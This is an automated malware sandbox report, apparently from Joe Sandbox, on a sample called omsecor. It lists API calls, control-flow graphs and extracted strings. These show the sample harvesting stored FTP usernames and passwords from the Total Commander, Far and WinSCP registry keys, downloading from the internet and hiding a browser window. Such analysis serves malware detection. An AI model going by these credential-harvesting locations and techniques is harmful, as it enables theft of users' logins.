                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

                          Control-flow Graph

                          control_flow_graph 242 403c10-403c73 call 40be9d call 405511 * 2 call 40848f 251 403c75-403c77 242->251 252 403ca9-403cad 242->252 251->252 253 403c79-403c94 ExpandEnvironmentStringsW 251->253 254 403cb3-403d15 call 405511 * 3 252->254 255 403dfe 252->255 256 403c95 call 4039ea 253->256 271 403d18-403d34 SHGetFolderPathW 254->271 257 403e00-403e08 call 4033a0 255->257 258 403e0a-403e12 call 40be3a 255->258 260 403c9a-403ca3 PathRemoveFileSpecW 256->260 267 403e13-403e17 257->267 258->267 260->252 272 403d36-403d39 271->272 273 403d7f-403d86 271->273 275 403d5a 272->275 276 403d3b-403d58 call 4039a3 272->276 273->271 274 403d88-403d8c 273->274 274->255 279 403d8e-403dce call 405511 * 2 call 40848f 274->279 278 403d5c-403d76 275->278 276->278 281 403d77 call 408248 278->281 289 403dd0-403dd2 279->289 290 403dfa 279->290 283 403d7c 281->283 283->273 289->290 291 403dd4-403df7 ExpandEnvironmentStringsW call 4039a3 289->291 290->255 291->290
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

                          Control-flow Graph

                          control_flow_graph 403 4027e6-402809 OleInitialize call 40a469 406 402813-402819 403->406 407 40280b-40280e 403->407 409 402820-402832 call 405511 406->409 410 40281b-40281e 406->410 408 402c2d-402c31 407->408 411 402838-40284f call 40a345 409->411 410->409 410->411 416 402851 411->416 417 40285f-402862 411->417 418 402852 call 40a65e 416->418 419 402864-402867 417->419 420 402869 417->420 421 402857-40285a 418->421 419->420 422 402879-40287d 419->422 423 402869 call 4072ed 420->423 426 402c2c 421->426 425 40287f call 409f2b 422->425 424 40286e-402873 423->424 424->422 427 402884-402888 425->427 426->408 428 402893-4028a0 427->428 429 40288a-40288d 427->429 431 4028a2-4028ad 428->431 432 4028b7-4028be 428->432 429->428 430 40296a 429->430 435 402970-402978 430->435 433 4028af call 408f26 431->433 434 4028c4-4028cc 432->434 436 4028b4 433->436 437 4028d3-4028e3 434->437 438 4028ce 434->438 439 402c20-402c23 435->439 440 40297e-402984 435->440 436->432 441 4028e5 call 408f26 437->441 438->437 442 402c25 call 40a65e 439->442 443 402986-4029a2 call 40a569 440->443 444 4029bc-4029c0 440->444 448 4028ea-4028ef 441->448 449 402c2a 442->449 457 4029a5 call 4089fd 443->457 446 4029c2-4029de call 40a569 444->446 447 4029f8-4029fc 444->447 467 4029e1 call 4089fd 446->467 452 402a04-402a0c 447->452 453 4029fe-402a02 447->453 454 4028f1-402925 call 407573 SysAllocString 448->454 455 402956-402957 448->455 449->426 460 402a3b-402a44 452->460 461 402a0e-402a35 call 40920a call 409c49 SysAllocString SysFreeString 452->461 453->452 453->460 470 402927-402938 SysFreeString 454->470 471 40293a-402941 454->471 459 402959 call 40a65e 455->459 464 4029aa-4029b8 457->464 468 40295e 459->468 465 402a46-402a5a 460->465 466 402a6f-402a73 460->466 461->460 472 402a5d call 408f26 465->472 473 402aa2-402aa6 466->473 474 402a75-402a8d 466->474 475 4029e6-4029f4 467->475 468->430 470->470 470->471 477 402943-402945 471->477 478 402947-40294a call 4091bd 471->478 479 402a62-402a6c SysAllocString 472->479 481 402ad1-402ad5 473->481 482 402aa8-402abc 473->482 480 402a90 call 408f26 474->480 475->447 486 40294f-402954 477->486 478->486 479->466 488 402a95-402a9f SysAllocString 480->488 483 402b04-402b07 481->483 484 402ad7-402aef 481->484 489 402abf call 408f26 482->489 491 402b09 call 40a65e 483->491 490 402af2 call 408f26 484->490 486->435 488->473 492 402ac4-402ace SysAllocString 489->492 493 402af7-402b01 SysAllocString 490->493 494 402b0e-402b11 491->494 492->481 493->483 495 402b13 494->495 496 402b1a-402b2d 494->496 495->496 497 402b49-402b4d 496->497 498 402b2f-402b47 call 407573 496->498 500 402b55-402b66 call 407573 call 409c49 497->500 501 402b4f-402b53 497->501 498->497 504 402b6b-402b6f 500->504 501->500 501->504 506 402b71-402b7e call 40584d call 409c49 504->506 507 402b83-402b87 504->507 506->507 510 402b89-402b9c call 407573 507->510 511 402b9e-402ba2 507->511 510->511 514 402ba4-402bad call 40584d 511->514 515 402baf-402be1 call 40584d 511->515 514->515 522 402be3-402be8 call 408825 515->522 523 402bea call 408692 515->523 527 402bef-402bf8 522->527 523->527 528 402bfa-402bfd 527->528 529 402bff 527->529 528->529 530 402c01-402c0f SysFreeString 528->530 529->530 530->439 531 402c11-402c1e SysFreeString 530->531 531->439 531->531
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004027F5
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Internet$InitializeOpenOption
                          • String ID: From: true
                          • API String ID: 1176259655-9585188
                          • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                          • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

                          Control-flow Graph

                          control_flow_graph 532 402e3e-402e59 call 40d5b0 535 40327e-403286 532->535 536 402e5f-402e60 532->536 537 402e61-402ea5 call 40586b call 4058fb 536->537 542 402eb4 537->542 543 402ea7-402ead 537->543 545 402eb7-402ecb GetModuleFileNameW 542->545 543->542 544 402eaf-402eb2 543->544 544->545 546 402ed6-402edc GetCurrentDirectoryW 545->546 547 402ecd-402ed4 call 406cf9 545->547 549 402ee2-402f14 call 405511 call 4054ed * 2 546->549 547->549 557 402f16-402f22 call 405467 549->557 558 402f2a-402f94 GetLastError call 40a786 call 407552 call 405511 call 40584d 549->558 557->558 563 402f24 557->563 570 402f96-402fa6 558->570 571 402fa8 call 4056f9 558->571 563->558 572 402fad-402fd8 call 4054ed * 2 call 40584d 570->572 571->572 580 402fda-402fea 572->580 581 402fec call 4056f9 572->581 582 402ff1-403038 call 4054ed * 2 call 405511 call 4054ed 580->582 581->582 592 40303a-40304a 582->592 593 40304c call 4056f9 582->593 594 403051-403081 call 4054ed * 3 call 40584d 592->594 593->594 604 403083-403093 594->604 605 403095-40309b call 4056f9 594->605 606 4030a0-403132 call 405451 call 406d42 call 405511 call 4054ed * 4 call 40253c 604->606 605->606 624 403251-40325f GetLastError 606->624 625 403138-40313e 606->625 628 403262-403276 call 40a786 624->628 626 403144-403148 625->626 627 40322d-403235 625->627 626->627 631 40314e-403186 call 40584d call 407552 call 405511 call 40584d 626->631 629 403241 627->629 630 403237-40323f GetLastError 627->630 628->537 637 40327c-40327d 628->637 633 403244-40324f 629->633 630->633 644 403188-403198 631->644 645 40319a call 4056f9 631->645 633->628 637->535 646 40319f-4031c8 call 4054ed * 2 call 40584d 644->646 645->646 654 4031ca-4031da 646->654 655 4031dc call 4056f9 646->655 656 4031e1-403228 call 4054ed * 2 call 40253c 654->656 655->656 656->624 664 40322a 656->664 664->627
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                          • RegCloseKey.ADVAPI32(?), ref: 0040442A
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapOpen$AllocCloseEnumFree
                          • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                          • API String ID: 416369273-4007225339
                          • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                          • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                          • StrStrIA.SHLWAPI(?,?), ref: 00404913
                          • StrStrIA.SHLWAPI(?,?), ref: 00404925
                          • StrStrIA.SHLWAPI(?,?), ref: 00404935
                          • StrStrIA.SHLWAPI(?,?), ref: 00404947
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                          • API String ID: 1635188419-1322549247
                          • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                          • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID:
                          • String ID: http$+@
                          • API String ID: 0-4127549746
                          • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                          • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                          APIs
